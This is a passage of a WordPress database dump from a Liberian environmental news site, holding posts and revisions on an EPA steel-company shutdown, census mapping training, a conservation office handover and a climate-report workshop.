/wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Charles F. Kaizai, Jamaica Road Community Leader said they\ncan’t resist the construction of the cement factory because it would provide\njobs and other opportunities for local residents, while Billimah Community\nChairman, A. Mulbah Dukuly expressed satisfaction for the project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','EPA Holds Public Hearing for New Cement Factory','','inherit','closed','closed','','3023-revision-v1','','','2020-03-03 15:32:41','2020-03-03 15:32:41','',3023,'https://ekmsliberia.info/3023-revision-v1/',0,'revision','',0),(3027,38,'2020-03-03 15:46:10','2020-03-03 15:46:10','<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Garson Steel Corporation, a company producing nails at the\nIndustrial Park, Garnesville has been shut down by authorities of Liberia\nEnvironmental Protection Agency (EPA) in connection with a bogus environmental permit,\nbut the company says the agency’s action is harsh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The closure order was effected on Friday 28 February 2020 by\ntechnicians and environmental inspectors headed by EPA Deputy Executive\nDirector, Randall M. Dobayou. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>John Jallah, EPA manager for Compliance and Enforcement said\nGarson Steel has been operating with a forged and invalid environmental permit\ncontrary to Part III of the Environmental Protection and Management Law of\nLiberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that environmental inspectors discovered that\nthe fake permit, which was displayed at the company’s premises has a wrong\npermit coding and numbering as displayed within the header of the Environmental\nPermit Sheet and has no indication of the date on which said permit was issued.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reading a closure notice which was served on the company\nmanagement, and cc to Justice Minister Frank Musa Dean, Mr. Jallah also said\nGarson Steel Corporation’s operation poses serious environmental and public\nhealth threat to nearby environmental receptors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the shut-down order was executed to\nprohibit further unsustainable operation of Garson Steel Corporation consistent\nwith Section 95 and Section 6 of the EPML and the EPA Act of 2000.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the decision was also taken because Garson\nSteel has also failed to submit an environmental audit or quarterly\nenvironmental monitoring reports contrary to Section 25 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company has on various occasions provided false\ninformation to the FPA and its inspectors relating to its operating permit and\ncompliance which is contrary to Section 105 of the EPML and Sections 22 and 38(1)\nof the Act creating the EPA, Mr. Jallah said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to Mr. Jallah’s statement, Deputy Executive Director\nDobayou said the EPA appreciates that the company is providing jobs, but it\ncan’t however compromise the environment and public health, which Garson Steel\nCorporation’s operation poses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Garson Steel Corporation Manager Nathaniel William told\nreporters following the shutdown exercise that the decision to closed down the\ncompany is unfortunate and would affect Liberians in its employ.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. William who couldn’t deny the claims made by the EPA said\nhe would had preferred an amicable solution to the situation. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Shutdown Steel Company for Bogus Environmental Permit','','publish','open','open','','epa-shutdown-steel-company-for-bogus-environmental-permit','','','2020-03-03 15:46:13','2020-03-03 15:46:13','',0,'https://ekmsliberia.info/?p=3027',203,'post','',0),(3028,38,'2020-03-03 15:45:31','2020-03-03 15:45:31','EPA Deputy Executive Director Dobayou places a padlock on company’s entrance ','shutdown','','inherit','open','closed','','shutdown','','','2020-03-03 15:45:56','2020-03-03 15:45:56','',3027,'https://ekmsliberia.info/wp-content/uploads/2020/03/shutdown.jpg',0,'attachment','image/jpeg',0),(3029,38,'2020-03-03 15:46:10','2020-03-03 15:46:10','<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Garson Steel Corporation, a company producing nails at the\nIndustrial Park, Garnesville has been shut down by authorities of Liberia\nEnvironmental Protection Agency (EPA) in connection with a bogus environmental permit,\nbut the company says the agency’s action is harsh.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The closure order was effected on Friday 28 February 2020 by\ntechnicians and environmental inspectors headed by EPA Deputy Executive\nDirector, Randall M. Dobayou. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>John Jallah, EPA manager for Compliance and Enforcement said\nGarson Steel has been operating with a forged and invalid environmental permit\ncontrary to Part III of the Environmental Protection and Management Law of\nLiberia (EPML).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that environmental inspectors discovered that\nthe fake permit, which was displayed at the company’s premises has a wrong\npermit coding and numbering as displayed within the header of the Environmental\nPermit Sheet and has no indication of the date on which said permit was issued.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Reading a closure notice which was served on the company\nmanagement, and cc to Justice Minister Frank Musa Dean, Mr. Jallah also said\nGarson Steel Corporation’s operation poses serious environmental and public\nhealth threat to nearby environmental receptors.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the shut-down order was executed to\nprohibit further unsustainable operation of Garson Steel Corporation consistent\nwith Section 95 and Section 6 of the EPML and the EPA Act of 2000.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the decision was also taken because Garson\nSteel has also failed to submit an environmental audit or quarterly\nenvironmental monitoring reports contrary to Section 25 of the EPML.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The company has on various occasions provided false\ninformation to the FPA and its inspectors relating to its operating permit and\ncompliance which is contrary to Section 105 of the EPML and Sections 22 and 38(1)\nof the Act creating the EPA, Mr. Jallah said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prior to Mr. Jallah’s statement, Deputy Executive Director\nDobayou said the EPA appreciates that the company is providing jobs, but it\ncan’t however compromise the environment and public health, which Garson Steel\nCorporation’s operation poses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Garson Steel Corporation Manager Nathaniel William told\nreporters following the shutdown exercise that the decision to closed down the\ncompany is unfortunate and would affect Liberians in its employ.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. William who couldn’t deny the claims made by the EPA said\nhe would had preferred an amicable solution to the situation. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','EPA Shutdown Steel Company for Bogus Environmental Permit','','inherit','closed','closed','','3027-revision-v1','','','2020-03-03 15:46:10','2020-03-03 15:46:10','',3027,'https://ekmsliberia.info/3027-revision-v1/',0,'revision','',0),(3030,38,'2020-03-03 16:25:11','2020-03-03 16:25:11','<!-- wp:paragraph -->\n<p>Kakata, Margibi – Kakata, Margibi – Liberia Institute of Statistics and Geo-Information Services (LISGIS) has begun training selected field geo-mapping assistants to carry out the mapping exercise of the entire country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These assistants are expected to help the already professional Geo-Information Services Specialists on the field to carry out the mapping over a 10-month period.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The result from the mapping process is supposed to pave the way for the next census to be conducted in 2021.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The mapping is expected to start following the conclusion of a 24-day training of 200 geo-mappers currently being trained in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Varfee Holmes, Public Affairs Director at LISGIS, told FrontPageAfrica that the field assistants will also be used to conduct the national census in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The field assistants will be responsible to carry out geographic mapping activities for the census; upon getting the green light from the legislature after they have set up a date for the census. The mapping exercise will be done as a roadmap leading to the actual census day,” Holmes noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the mapping of the country is part of the preliminary activities leading to the upcoming census to be conducted in 2021.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are supposed to start the first phase of those preliminary activities which include the mapping of the entire country. We will be capturing the 43,000 square miles of Liberia; capturing all of the structures, capturing reliefs and demography features in the different communities. Those are things that begin the exercise of the upcoming census to be conducted,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said field assistants will be trained to use GIS technology via GPS </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the recruitment of the field assistants was done in all of the 15 counties. Over 200 persons were shortlisted to be trained.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, Holmes said the statistics house is trying to catch up with time since the country has been lacking behind to conduct census since 2008.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that Liberia is expected to conduct census before December 2024; adding: “Time is not in the country’s favor to conduct the census to meet up with international best practice.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that Liberia has moved one step ahead in the GIS sector. “Liberia is ready to be on par with other advanced countries in the world. Liberia became ‘Geo-Referenced’ before nations like Nigeria, Senegal, Togo, among others. Liberia is moving one step further from topographic sheet to area photograph and satellite images among others.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Director-General of LISGIS, Francis F. Wreh, said at the end of the training, he expects field assistants to be able to capture GPRS coordinates.  Also among of the works of the field assistants will be to demarcate small portions of land. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Director-General of LISGIS, Francis F. Wreh, said at the end of the training, he expects field assistants to be able to capture GPRS coordinates.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“For example, when we say GPRS coordinate, it means people should be able to locate the Kakata City Hall on GPRS even when they don’t know the place. This is the kind of work you guys are here to be trained to.” </p>\n<!-- /wp:paragraph -->','Liberia: LISGIS Trains Mappers Ahead of Census 2021','','publish','open','open','','liberia-lisgis-trains-mappers-ahead-of-census-2021','','','2020-03-03 16:25:14','2020-03-03 16:25:14','',0,'https://ekmsliberia.info/?p=3030',202,'post','',0),(3031,38,'2020-03-03 16:19:57','2020-03-03 16:19:57','','lisgis-trains-mapping-agents','','inherit','open','closed','','lisgis-trains-mapping-agents','','','2020-03-03 16:19:57','2020-03-03 16:19:57','',3030,'https://ekmsliberia.info/wp-content/uploads/2020/03/lisgis-trains-mapping-agents.png',0,'attachment','image/png',0),(3032,38,'2020-03-03 16:25:11','2020-03-03 16:25:11','<!-- wp:paragraph -->\n<p>Kakata, Margibi – Kakata, Margibi – Liberia Institute of Statistics and Geo-Information Services (LISGIS) has begun training selected field geo-mapping assistants to carry out the mapping exercise of the entire country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>These assistants are expected to help the already professional Geo-Information Services Specialists on the field to carry out the mapping over a 10-month period.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The result from the mapping process is supposed to pave the way for the next census to be conducted in 2021.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The mapping is expected to start following the conclusion of a 24-day training of 200 geo-mappers currently being trained in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Varfee Holmes, Public Affairs Director at LISGIS, told FrontPageAfrica that the field assistants will also be used to conduct the national census in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The field assistants will be responsible to carry out geographic mapping activities for the census; upon getting the green light from the legislature after they have set up a date for the census. The mapping exercise will be done as a roadmap leading to the actual census day,” Holmes noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the mapping of the country is part of the preliminary activities leading to the upcoming census to be conducted in 2021.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are supposed to start the first phase of those preliminary activities which include the mapping of the entire country. We will be capturing the 43,000 square miles of Liberia; capturing all of the structures, capturing reliefs and demography features in the different communities. Those are things that begin the exercise of the upcoming census to be conducted,” he noted.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said field assistants will be trained to use GIS technology via GPS </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the recruitment of the field assistants was done in all of the 15 counties. Over 200 persons were shortlisted to be trained.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking further, Holmes said the statistics house is trying to catch up with time since the country has been lacking behind to conduct census since 2008.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He emphasized that Liberia is expected to conduct census before December 2024; adding: “Time is not in the country’s favor to conduct the census to meet up with international best practice.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that Liberia has moved one step ahead in the GIS sector. “Liberia is ready to be on par with other advanced countries in the world. Liberia became ‘Geo-Referenced’ before nations like Nigeria, Senegal, Togo, among others. Liberia is moving one step further from topographic sheet to area photograph and satellite images among others.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Director-General of LISGIS, Francis F. Wreh, said at the end of the training, he expects field assistants to be able to capture GPRS coordinates.  Also among of the works of the field assistants will be to demarcate small portions of land. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also, the Director-General of LISGIS, Francis F. Wreh, said at the end of the training, he expects field assistants to be able to capture GPRS coordinates.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“For example, when we say GPRS coordinate, it means people should be able to locate the Kakata City Hall on GPRS even when they don’t know the place. This is the kind of work you guys are here to be trained to.” </p>\n<!-- /wp:paragraph -->','Liberia: LISGIS Trains Mappers Ahead of Census 2021','','inherit','closed','closed','','3030-revision-v1','','','2020-03-03 16:25:11','2020-03-03 16:25:11','',3030,'https://ekmsliberia.info/3030-revision-v1/',0,'revision','',0),(3033,38,'2020-03-03 16:35:41','2020-03-03 16:35:41','','ci facebook','','inherit','open','closed','','ci-facebook','','','2020-03-03 16:35:41','2020-03-03 16:35:41','',1612,'https://ekmsliberia.info/wp-content/uploads/2019/11/ci-facebook.jpg',0,'attachment','image/jpeg',0),(3034,38,'2020-03-03 16:53:24','2020-03-03 16:53:24','<!-- wp:paragraph -->\n<p>Last week, we officially handed over a fully renovated and\nfurnished office to the Zodua Land Management Committee (ZLMC) in Garwula\nDistrict, Grand Cape Mount County as part of Conservation Agreements negotiated\nlast year with the Zodua communities to enhance protection of the critical\n20,000-hectare Zodua forest and surrounding forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Apart from ZLMC office renovation, three Zodua\ncommunities(Gohn, Falie and Kanga) that are part of the conservation agreement\nhave also received a range of benefits in exchange for the protection of their\nforests including conservation jobs (frontline Conservationists), assorted\nmedical supplies, scholarships and agricultural benefits among others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Our Project Manager Mr. Edward L.Massaquoi.Jr. and Project\nDirector Ms.Toushi Itoka officially presented the renovated office to the\nrepresentative of the County Development Superintendent Mr. Philip Zodua who\nsubsequently handed it to the ZLMC Chairperson Mr. Varney Massaquoi. This is\nall thanks to support from the Global Environment Facility-funded ‘’Good Growth\nPartnership\' that includes the UNDP.</p>\n<!-- /wp:paragraph -->','Conservation International, Liberia Last week, officially handed over a fully renovated and furnished office to the Zodua Land Management Committee','','publish','open','open','','conservation-international-liberia-last-week-officially-handed-over-a-fully-renovated-and-furnished-office-to-the-zodua-land-management-committee','','','2020-03-03 16:53:26','2020-03-03 16:53:26','',0,'https://ekmsliberia.info/?p=3034',201,'post','',0),(3035,38,'2020-03-03 16:53:04','2020-03-03 16:53:04','','Ci news','','inherit','open','closed','','ci-news','','','2020-03-03 16:53:04','2020-03-03 16:53:04','',3034,'https://ekmsliberia.info/wp-content/uploads/2020/03/Ci-news.jpg',0,'attachment','image/jpeg',0),(3036,38,'2020-03-03 16:53:24','2020-03-03 16:53:24','<!-- wp:paragraph -->\n<p>Last week, we officially handed over a fully renovated and\nfurnished office to the Zodua Land Management Committee (ZLMC) in Garwula\nDistrict, Grand Cape Mount County as part of Conservation Agreements negotiated\nlast year with the Zodua communities to enhance protection of the critical\n20,000-hectare Zodua forest and surrounding forests.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Apart from ZLMC office renovation, three Zodua\ncommunities(Gohn, Falie and Kanga) that are part of the conservation agreement\nhave also received a range of benefits in exchange for the protection of their\nforests including conservation jobs (frontline Conservationists), assorted\nmedical supplies, scholarships and agricultural benefits among others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Our Project Manager Mr. Edward L.Massaquoi.Jr. and Project\nDirector Ms.Toushi Itoka officially presented the renovated office to the\nrepresentative of the County Development Superintendent Mr. Philip Zodua who\nsubsequently handed it to the ZLMC Chairperson Mr. Varney Massaquoi. This is\nall thanks to support from the Global Environment Facility-funded ‘’Good Growth\nPartnership\' that includes the UNDP.</p>\n<!-- /wp:paragraph -->','Conservation International, Liberia Last week, officially handed over a fully renovated and furnished office to the Zodua Land Management Committee','','inherit','closed','closed','','3034-revision-v1','','','2020-03-03 16:53:24','2020-03-03 16:53:24','',3034,'https://ekmsliberia.info/3034-revision-v1/',0,'revision','',0),(3038,38,'2020-03-05 17:14:52','2020-03-05 17:14:52','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has concluded a two-day national validation workshop on Liberia’s First Biennial Update Report (BUR-1) Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BURs are reports to be submitted by non-Annex I Parties, containing updates of national Greenhouse Gas (GHG) inventories, including a national inventory report and information on mitigation actions, needs and support received.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such reports provide updates on actions undertaken by a party to implement the Convention, including its GHG emissions and removals by sinks, as well as on the actions to reduce emissions and enhance sinks.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The BUR-1 national validation workshop is intended to prepare and submit the country to fulfill its obligations to the United Nations Framework Convention on Climate Change (UNFCCC Article 12).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop ran from February 20-21, 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants were drawn from government ministries and agencies, including Ministry of Agriculture, Ministry of Mines &amp; Energy, Liberia Electricity Corporation (LEC), Rural Renewable Energy Agency (RREA), Forestry Development Authority (FDA), City Corporations of Monrovia and Paynesville, National Fisheries and Aquaculture Authority (NaFAA) and Ministry of Transport.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other participants represented the University of Liberia, United Methodist University (UMU), Cuttington University, CEMENCO, environmental groups and representatives of rural parts of Liberia.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing the opening ceremony on behalf of Mines &amp; Energy Minister Gesler E. Murray, the Assistant Minister for Planning, Research and Development, Mr. Johnson S. Willabo, Jr. said his entity is a part of the project because it is related to the energy sector.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Assistant Minister Willabo, the hydro at Mount Coffee in rural Montserrado County is a very efficient way of generating power for which his ministry is highly involved with creating awareness in the usage of energy through power.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he said the challenge facing this drive is the reduction of power at the hydro during some times of the year for which he revealed that solar power generation as an option has become inevitable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He added that the power lines of the CLSG (Cote d’Ivoire, Liberia, Sierra Leone and Guinea) from neighboring Cote d’Ivoire are also major components in the generation of electricity through energy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the start of the two-day national validation workshop of Liberia’s first BUR-1 Project, a proxy for Dr. Nathaniel T. Blama, Sr., EPA Executive Director, Mr. Z. Elijah Whapoe stated that Liberia as a party to the UNFCCC is under obligation to implement the first BUR-1 Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With work being developed in this framework, Mr. Whapoe, who is a Manager for Planning and Policy at EPA, said the report considers constraints and gaps being experienced by the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are working along with all stakeholders in developing a national State of the Environment Report (EPA),” Mr. Whapoe informed the participants.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his presentation, Mr.&nbsp;Benjamin S. Karmorh, Jr., National Focal Point for the UNFCCC, pointed out that&nbsp;climate change is a global crisis and Liberia is no exception to it, with analysis and research showing that the country is vulnerable to the adverse impacts of this phenomena.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He added that the impacts of climate change in Liberia is seen all over the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Although Liberia has relatively high elevation with highland and rolling hills covered rain forest, he said climate change is a global threat with Liberia being no exception as erosion continues to eat up the coastline.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Karmorh explained: “It’s in this view that Liberia is a signatory to a number of conventions and protocols in making sure that climate change related issues are addressed at both local and international levels.”&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Moreover, Mr. Karmorh informed the gathering that the impact of global climate change will increase and if nothing is done may lead to devastation as this is already being felt in Liberia and&nbsp;human activities adding to this effect is not helping either.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He recommended that the environmental resources and potential of Liberia is enormous and if properly managed will benefit the current generation and future generations to come.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“Liberia is vulnerable to climate change due to high rate of poverty, poor infrastructures, inadequate and lack of trained human resources, etc. It is a serious and on-going threat to our Agenda for Transformation. It is also a threat to national sustainable development, peace, security and stability,” Mr. Karmorh said during his presentation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part,&nbsp;Dr. Charles Asumana, Sr.,&nbsp;National Project Coordinator of the BUR–1 Project &amp; UNFCCCTechnical Expert Reviewer, said&nbsp;the objective of the project is to prepare and submit Liberia’s First BUR–1 to fulfill national obligations to the UNFCCC (Article 12).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Ansumana disclosed that the project proposal has been prepared as per requirements of the UNFCCC for BURs and based on Decision 17/CP. 8 - Guidelines for the preparation of Biennial Update Report from Parties not included in Annex I to the Convention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said the project falls under the support of the Global Environmental Facility (GEF) for convention-related reporting and assessment, and is implemented on an agreed full cost basis requiring only in-kind contribution by GEF-eligible countries.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He went on to say that the project is in conformity with objective 3 of the GEF-6 Climate Mitigation Strategy that focuses on fostering enabling conditions to mainstream mitigation concerns into sustainable development strategies.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s strategic location in the West Coast of Africa within the Mano River basin makes it ideal for her rich natural resources in the region, likewise some major environmental issues associated with it.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The inter-linkages between environment, development, security and good governance in Liberia are clear and the threat of climate change is ever present.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Over the last few decades, poor environmental management, overexploitation of natural resources and poverty have been some of the issues that the country has been faced with but due to the brilliant leadership of many stakeholders involved mainly the EPA and the intervention of international partners, Liberia seems to be well on course.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA is with the conviction that the impact of global climate will increase and if nothing is done may lead to devastation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia has vast coastline which stretches about 580 kilometers and host huge population density of the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The placement of major sea ports along the coastline and the ever presence of beautiful beaches give a greater advantage to the Liberian economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The biodiversity supports lives and livelihoods, by providing essential services. It is a major source of harvestable goods including food, medicines and building materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Biodiversity is also essential for the regulation of natural processes, and the earth’s life support systems such as carbon sequestration, soil formation and water purification.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Climate change is a global crisis and Liberia is no exception to it, analysis and research show that Liberia is vulnerable to the adverse impacts of this phenomena. The impacts of climate change in Liberia is seen all over the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It’s in this view that Liberia is signatory to a number of conventions and protocols in making sure that climate change related issues are addressed at both local and international levels.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->','EPA Ends Validation Workshop on 1st Biennial Update Report Project','','publish','open','open','','epa-ends-validation-workshop-on-1st-biennial-update-report-project','','','2020-03-05 17:14:54','2020-03-05 17:14:54','',0,'https://ekmsliberia.info/?p=3038',200,'post','',0),(3039,38,'2020-03-05 17:13:49','2020-03-05 17:13:49','','EPA2','cross section of participants at the workshop','inherit','open','closed','','epa2','','','2020-03-05 17:14:21','2020-03-05 17:14:21','',3038,'https://ekmsliberia.info/wp-content/uploads/2020/03/EPA2.jpg',0,'attachment','image/jpeg',0),(3040,38,'2020-03-05 17:14:52','2020-03-05 17:14:52','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has concluded a two-day national validation workshop on Liberia’s First Biennial Update Report (BUR-1) Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BURs are reports to be submitted by non-Annex I Parties, containing updates of national Greenhouse Gas (GHG) inventories, including a national inventory report and information on mitigation actions, needs and support received.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such reports provide updates on actions undertaken by a party to implement the Convention, including its GHG emissions and removals by sinks, as well as on the actions to reduce emissions and enhance sinks.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The BUR-1 national validation workshop is intended to prepare and submit the country to fulfill its obligations to the United Nations Framework Convention on Climate Change (UNFCCC Article 12).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop ran from February 20-21, 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants were drawn from government ministries and agencies, including Ministry of Agriculture, Ministry of Mines &amp; Energy, Liberia Electricity Corporation (LEC), Rural Renewable Energy Agency (RREA), Forestry Development Authority (FDA), City Corporations of Monrovia and Paynesville, National Fisheries and Aquaculture Authority (NaFAA) and Ministry of Transport.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other participants represented the University of Liberia, United Methodist University (UMU), Cuttington University, CEMENCO, environmental groups and representatives of rural parts of Liberia.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing the opening ceremony on behalf of Mines &amp; Energy Minister Gesler E. Murray, the Assistant Minister for Planning, Research and Development, Mr. Johnson S. Willabo, Jr. said his entity is a part of the project because it is related to the energy sector.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to Assistant Minister Willabo, the hydro at Mount Coffee in rural Montserrado County is a very efficient way of generating power for which his ministry is highly involved with creating awareness in the usage of energy through power.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, he said the challenge facing this drive is the reduction of power at the hydro during some times of the year for which he revealed that solar power generation as an option has become inevitable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;He added that the power lines of the CLSG (Cote d’Ivoire, Liberia, Sierra Leone and Guinea) from neighboring Cote d’Ivoire are also major components in the generation of electricity through energy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the start of the two-day national validation workshop of Liberia’s first BUR-1 Project, a proxy for Dr. Nathaniel T. Blama, Sr., EPA Executive Director, Mr. Z. Elijah Whapoe stated that Liberia as a party to the UNFCCC is under obligation to implement the first BUR-1 Project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>With work being developed in this framework, Mr. Whapoe, who is a Manager for Planning and Policy at EPA, said the report considers constraints and gaps being experienced by the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are working along with all stakeholders in developing a national State of the Environment Report (EPA),” Mr. Whapoe informed the participants.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In 